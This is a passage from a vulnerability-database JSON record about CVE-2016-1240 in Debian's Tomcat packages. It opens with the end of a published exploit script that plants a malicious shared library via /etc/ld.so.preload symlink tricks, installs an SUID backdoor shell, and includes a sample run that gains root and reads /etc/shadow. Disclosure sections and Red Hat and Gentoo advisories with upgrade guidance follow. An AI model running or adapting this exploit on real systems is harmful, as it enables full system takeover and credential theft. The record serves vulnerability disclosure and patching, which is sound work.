Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $TOMCATLOG\r\n\ttouch $TOMCATLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload 2>/dev/null\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\"\r\n\texit 3\r\nfi\r\nif [ \"$2\" = \"-deferred\" ]; then\r\n\tmode=\"deferred\"\r\nelse\r\n\tmode=\"active\"\r\nfi\r\n\r\n# Priv check\r\necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\"\r\nid | grep -q tomcat\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nTOMCATLOG=\"$1\"\r\nif [ ! -f $TOMCATLOG ]; then\r\n\techo -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\"\r\n\r\n# [ Deferred exploitation ]\r\n\r\n# Symlink the log file to /etc/default/locale file which gets executed daily on default\r\n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r\n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r\n# restarted and file owner gets changed.\r\nif [ \"$mode\" = \"deferred\" ]; then\r\n\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r\n\tif [ $? -ne 0 ]; then\r\n\t\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\t\tcleanexit 3\r\n\tfi\r\n\techo -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\techo -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\"\r\n\techo -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"\r\n\techo -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r\n\techo -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\"\r\n\texit 0\r\nfi\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\tunlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Symlink the log file to ld.so.preload\r\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\r\n# Wait for Tomcat to re-open the logs\r\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/ld.so.preload file should be owned by tomcat user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo --help 2>/dev/null >/dev/null\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n\r\n--------------[ EOF ]--------------------\r\n\r\n\r\n\r\nExample exploit run:\r\n~~~~~~~~~~~~~~\r\n\r\ntomcat7@ubuntu:/tmp$ id\r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\ntomcat7@ubuntu:/tmp$ lsb_release -a\r\nNo LSB modules are available.\r\nDistributor ID:\tUbuntu\r\nDescription:\tUbuntu 16.04 LTS\r\nRelease:\t16.04\r\nCodename:\txenial\r\n\r\ntomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat\r\nii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries\r\nii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine\r\nii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files\r\n\r\ntomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out \r\n \r\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\nCVE-2016-1240\r\n\r\nDiscovered and coded by: \r\n\r\nDawid Golunski \r\nhttp://legalhackers.com \r\n\r\n[+] Starting the exploit in [active] mode with the following privileges: \r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\n[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out\r\n\r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n\r\n[+] Backdoor/low-priv shell installed at: \r\n-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\n[+] Symlink created at: \r\nlrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload\r\n\r\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\r\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\r\n\r\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \r\n-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload\r\n\r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n\r\n[+] The /etc/ld.so.preload file now contains: \r\n/tmp/privesclib.so\r\n\r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n\r\n[+] Rootshell got assigned root SUID perms at: \r\n-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\nPlease tell me you're seeing this too ;) \r\n\r\n[+] Executing the rootshell /tmp/tomcatrootsh now! \r\n\r\ntomcatrootsh-4.3# id\r\nuid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)\r\ntomcatrootsh-4.3# whoami\r\nroot\r\ntomcatrootsh-4.3# head -n3 /etc/shadow\r\nroot:$6$oaf[cut]:16912:0:99999:7:::\r\ndaemon:*:16912:0:99999:7:::\r\nbin:*:16912:0:99999:7:::\r\ntomcatrootsh-4.3# exit\r\nexit\r\n\r\n[+] Cleaning up...\r\n\r\n[+] Job done. Exiting with code 0 \r\n\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nLocal attackers who have gained access to tomcat user account (for example \r\nremotely via a vulnerable web application, or locally via weak webroot perms),\r\ncould escalate their privileges to root and fully compromise the affected system.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nThe following Debian package versions are affected:\r\n\r\nTomcat 8 <= 8.0.36-2\r\nTomcat 7 <= 7.0.70-2\r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nA more detailed lists of affected packages can be found at:\r\n\r\nDebian:\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\nUbuntu:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nOther systmes that use Tomcat packages provided by Debian may also be affected.\r\n\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nDebian Security Team was contacted and has fixed affected upstream packages.\r\nUpdate to the latest tomcat packages provided by your distribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n\r\nThe exploit's sourcecode\r\nhttp://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh\r\n\r\nCVE-2016-1240\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240\r\n\r\nUbuntu Security Notice USN-3081-1:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nDebian Security Advisory DSA-3669-1 (tomcat7):\r\nhttps://lists.debian.org/debian-security-announce/2016/msg00249.html\r\nhttps://www.debian.org/security/2016/dsa-3669\r\n\r\nDebian Security Advisory DSA-3670-1 (tomcat8):\r\nhttps://www.debian.org/security/2016/dsa-3670\r\n\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nhttp://legalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n30.09.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40450/"}], "redhat": [{"lastseen": "2019-05-29T14:34:47", "bulletinFamily": "unix", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement for Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es):\n\n* It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long. (CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other then their own. (CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for the NIO HTTP connector. This led to the current Processor object being added to the Processor cache multiple times allowing information leakage between requests including, and not limited to, session ID and the response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder. (CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s):\n\n* This enhancement update adds the Red Hat JBoss Web Server 3.1.0. These packages provide a number of enhancements over the previous version of Red Hat JBoss Web Server.\n\nUsers of Red Hat JBoss Web Server are advised to upgrade to these updated packages, which add this enhancement.", "modified": "2017-07-25T00:20:14", "published": "2017-03-07T23:57:09", "id": "RHSA-2017:0457", "href": "https://access.redhat.com/errata/RHSA-2017:0457", "type": "redhat", "title": "(RHSA-2017:0457) Important: Red Hat JBoss Web Server security and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:44", "bulletinFamily": "unix", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement for Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es):\n\n* It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long. (CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other then their own. (CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for the NIO HTTP connector. This led to the current Processor object being added to the Processor cache multiple times allowing information leakage between requests including, and not limited to, session ID and the response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder. (CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s):\n\n* This enhancement update adds the Red Hat JBoss Web Server 3.1.0 packages to Red Hat Enterprise Linux 7. These packages provide a number of enhancements over the previous version of Red Hat JBoss Web Server. (JIRA#JWS-268)", "modified": "2018-03-19T16:14:02", "published": "2015-11-13T00:12:07", "id": "RHSA-2017:0456", "href": "https://access.redhat.com/errata/RHSA-2017:0456", "type": "redhat", "title": "(RHSA-2017:0456) Important: Red Hat JBoss Web Server 3.1.0 security and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:45", "bulletinFamily": "unix", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement for Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es):\n\n* It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long. (CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other then their own. (CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for the NIO HTTP connector. This led to the current Processor object being added to the Processor cache multiple times allowing information leakage between requests including, and not limited to, session ID and the response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder. (CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s):\n\nThis enhancement update adds the Red Hat JBoss Web Server 3.1.0 packages to Red Hat Enterprise Linux 6. These packages provide a number of enhancements over the previous version of Red Hat JBoss Web Server. (JIRA#JWS-267)\n\nUsers of Red Hat JBoss Web Server are advised to upgrade to these updated packages, which add this enhancement.", "modified": "2018-06-07T02:42:54", "published": "2015-11-12T23:40:07", "id": "RHSA-2017:0455", "href": "https://access.redhat.com/errata/RHSA-2017:0455", "type": "redhat", "title": "(RHSA-2017:0455) Important: Red Hat JBoss Web Server 3.1.0 security and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-05-28T22:26:23", "bulletinFamily": "unix", "description": "### Background\n\nApache Tomcat is a Servlet-3.0/JSP-2.2 Container.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Tomcat. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to cause a Denial of Service condition, obtain sensitive information, bypass protection mechanisms and authentication restrictions. \n\nA local attacker, who is a tomcat\u2019s system user or belongs to tomcat\u2019s group, could potentially escalate privileges. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache Tomcat users have to manually check their Tomcat runscripts to make sure that they don\u2019t use an old, vulnerable runscript. In addition: \n\nAll Apache Tomcat 7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/tomcat-7.0.70:7\"\n \n\nAll Apache Tomcat 8 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/tomcat-8.0.36:8\"", "modified": "2017-05-18T00:00:00", "published": "2017-05-18T00:00:00", "href": "https://security.gentoo.org/glsa/201705-09", "id": "GLSA-201705-09", "title": "Apache Tomcat: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}